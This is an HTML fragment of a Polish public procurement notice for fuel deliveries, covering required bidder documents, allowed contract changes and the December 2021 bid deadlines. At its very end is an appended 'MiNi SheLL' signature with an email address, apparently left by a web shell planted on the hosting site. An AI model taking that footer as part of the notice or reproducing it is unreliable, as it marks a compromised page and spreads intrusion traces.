załącznik nr<br/>4 do SWZ – wymagania dotyczące podpisania dokumentu elektronicznego wg rozdz. IX pkt 1.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub<br/>wniosek o dopuszczenie do udziału w postępowaniu - przykładowe oświadczenie – załącznik nr 4 do<br/>SWZ – wymagania dotyczące podpisania dokumentu elektronicznego wg rozdz. IX pkt 1.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> a) wypełniony formularz ofertowy (załącznik nr 1 do SWZ) – wymagania dotyczące podpisania<br/>dokumentu elektronicznego wg pkt 1.<br/>b) dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji<br/>wykonawcy/pełnomocnictwo. Pełnomocnictwo(a) - umocowanie do reprezentacji wykonawcy w<br/>przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio z odpisu z<br/>właściwego rejestru, albo z centralnej ewidencji informacji o działalności gospodarczej<br/>(przykładowo: KRS, CEIDG) ogólnie dostępnego na stronach internetowych ogólnodostępnych<br/>baz danych.<br/>1. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego<br/>reprezentowania, zamawiający żąda od wykonawcy odpisu lub informacji z Krajowego Rejestru<br/>Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego<br/>rejestru. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa powyżej, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o<br/>ile wykonawca wskazał w ofercie dane umożliwiające dostęp do tych dokumentów. Jeżeli w<br/>imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z<br/>dokumentów, o których mowa powyżej, zamawiający może żądać od wykonawcy<br/>pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania<br/>wykonawcy. Powyższe wymagania stosuje się odpowiednio do osoby działającej w imieniu<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego. 2.2. W<br/>przypadku oferty wspólnej należy do oferty załączyć dokument ustanawiający<br/>pełnomocnika do reprezentowania wykonawców wspólnie ubiegających się o udzielenie<br/>niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>niniejszego zamówienia publicznego – wymagania dotyczące podpisania dokumentu<br/>elektronicznego wg pkt 1.<br/>2. Dokumenty i oświadczenia wymagane w rozdziale VI SWZ, które wykonawca jest<br/>zobowiązany złożyć w ofercie:<br/>1) Na braku podstaw wykluczenia z postępowania Wykonawca składa wstępne oświadczenie<br/>dotyczące braku podstaw wykluczenia z postępowania, na podstawie art. 125 ust. 1 ustawy Pzp,<br/>zgodnie z treścią załącznika nr 3 do SWZ – wymagania dotyczące podpisania dokumentu<br/>elektronicznego wg pkt 1.<br/>2) Na wykazanie spełniania warunków udziału w postępowaniu Wykonawca składa wstępne<br/>oświadczenie dotyczące spełnienia warunków udziału w postępowaniu, na podstawie art. 125<br/>ust. 1 ustawy Pzp, zgodnie z treścią załącznika nr 2 do SWZ – wymagania dotyczące podpisania<br/>dokumentu elektronicznego wg pkt 1.<br/>3) W przypadku konsorcjum - oferta wspólna - w zakresie braku podstaw do wykluczenia<br/>oświadczenia (załącznik nr 3 do SWZ) składają wszyscy wykonawcy, w zakresie spełnienia<br/>warunków udziału ten wykonawca który spełnia dany warunek – wymagania dotyczące<br/>podpisania dokumentu elektronicznego wg pkt 1 <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> a) formularz ofertowy (załącznik nr 1 do SWZ)<br/>b) dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji<br/>wykonawcy/pełnomocnictwo. Pełnomocnictwo(a) - umocowanie do reprezentacji wykonawcy w<br/>przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio z odpisu z<br/>właściwego rejestru, albo z centralnej ewidencji informacji o działalności gospodarczej<br/>(przykładowo: KRS, CEIDG) ogólnie dostępnego na stronach internetowych ogólnodostępnych<br/>baz danych.<br/>c) oświadczenie dotyczące braku podstaw wykluczenia z postępowania, na podstawie art. 125<br/>ust. 1 ustawy Pzp, zgodnie z treścią załącznika nr 3 do SWZ<br/>d) oświadczenie dotyczące spełnienia warunków udziału w postępowaniu, na podstawie art. 125<br/>ust. 1 ustawy Pzp, zgodnie z treścią załącznika nr 2 do SWZ <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji<br/>wykonawcy/pełnomocnictwo. Pełnomocnictwo(a) - umocowanie do reprezentacji wykonawcy w<br/>przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio z odpisu z<br/>właściwego rejestru, albo z centralnej ewidencji informacji o działalności gospodarczej<br/>(przykładowo: KRS, CEIDG) ogólnie dostępnego na stronach internetowych ogólnodostępnych <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji<br/>wykonawcy/pełnomocnictwo. Pełnomocnictwo(a) - umocowanie do reprezentacji wykonawcy w<br/>przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio z odpisu z<br/>właściwego rejestru, albo z centralnej ewidencji informacji o działalności gospodarczej<br/>(przykładowo: KRS, CEIDG) ogólnie dostępnego na stronach internetowych ogólnodostępnych<br/>baz danych. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego określa załącznik nr<br/>8 do SWZ<br/>2. W oparciu o postanowienia art. 455 ust. 1 ustawy Pzp Zamawiający przewiduje możliwość<br/>następujących zmian umowy bez konieczności przeprowadzenia nowego postępowania.<br/>2.1 Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do<br/>treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co<br/>najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków<br/>ich wprowadzenia w zakresie:<br/>a) zmiana miejsca dostawy,<br/>b) zmiana ilości dostaw w związku z faktycznym zużyciem paliw, w tym: zmiana ilości punktów<br/>dostaw,<br/>c) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz wykonawcy skutkujące<br/>niemożliwością prowadzenia dostaw,<br/>3. Pozostałe zmiany:<br/>a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SWZ,<br/>b) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy z<br/>wyłączeniem zmiany wysokości wynagrodzenia,<br/>c) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku<br/>wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający<br/>zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca<br/>poniósł w związku z wynikającymi z umowy planowanymi świadczeniami.<br/>d) wystąpienie różnego rodzaju klęsk żywiołowych, epidemii, operacji wojennych, strajku<br/>generalnego.<br/>4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może<br/>wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>5. Postanowienia umowne zmienione z naruszeniem art. 454 i 455 podlegają unieważnieniu. Na<br/>miejsce unieważnionych postanowień umowy wchodzą postanowienia umowne w pierwotnym<br/>brzmieniu, zgodnie z postanowieniami art. 458 ustawy.<br/>6. Jeżeli Zamawiający zamierza zmienić warunki realizacji umowy, obowiązany jest<br/>przeprowadzić nowe postępowanie o udzielenie zamówienia, zgodnie z postanowieniami art.<br/>454 ustawy Pzp.<br/>7. Nie stanowi zmiany umowy: 1) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana<br/>dokumentów potwierdzających wykonanie robót, zmiana nr rachunku bankowego);<br/>2) zmiany danych teleadresowych.<br/>8. Wszelkie zmiany i uzupełnienia treści niniejszej umowy wymagają formy pisemnej pod<br/>rygorem nieważności, z zastrzeżeniem postanowień ust. 4.<br/>9. Zamawiający może odstąpić od umowy w terminie 30 dni od dnia powzięcia wiadomości o<br/>zaistnieniu istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie<br/>publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, lub dalsze<br/>wykonywanie umowy może zagrozić podstawowemu interesowi bezpieczeństwa państwa lub<br/>bezpieczeństwu publicznemu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-17 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-17 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com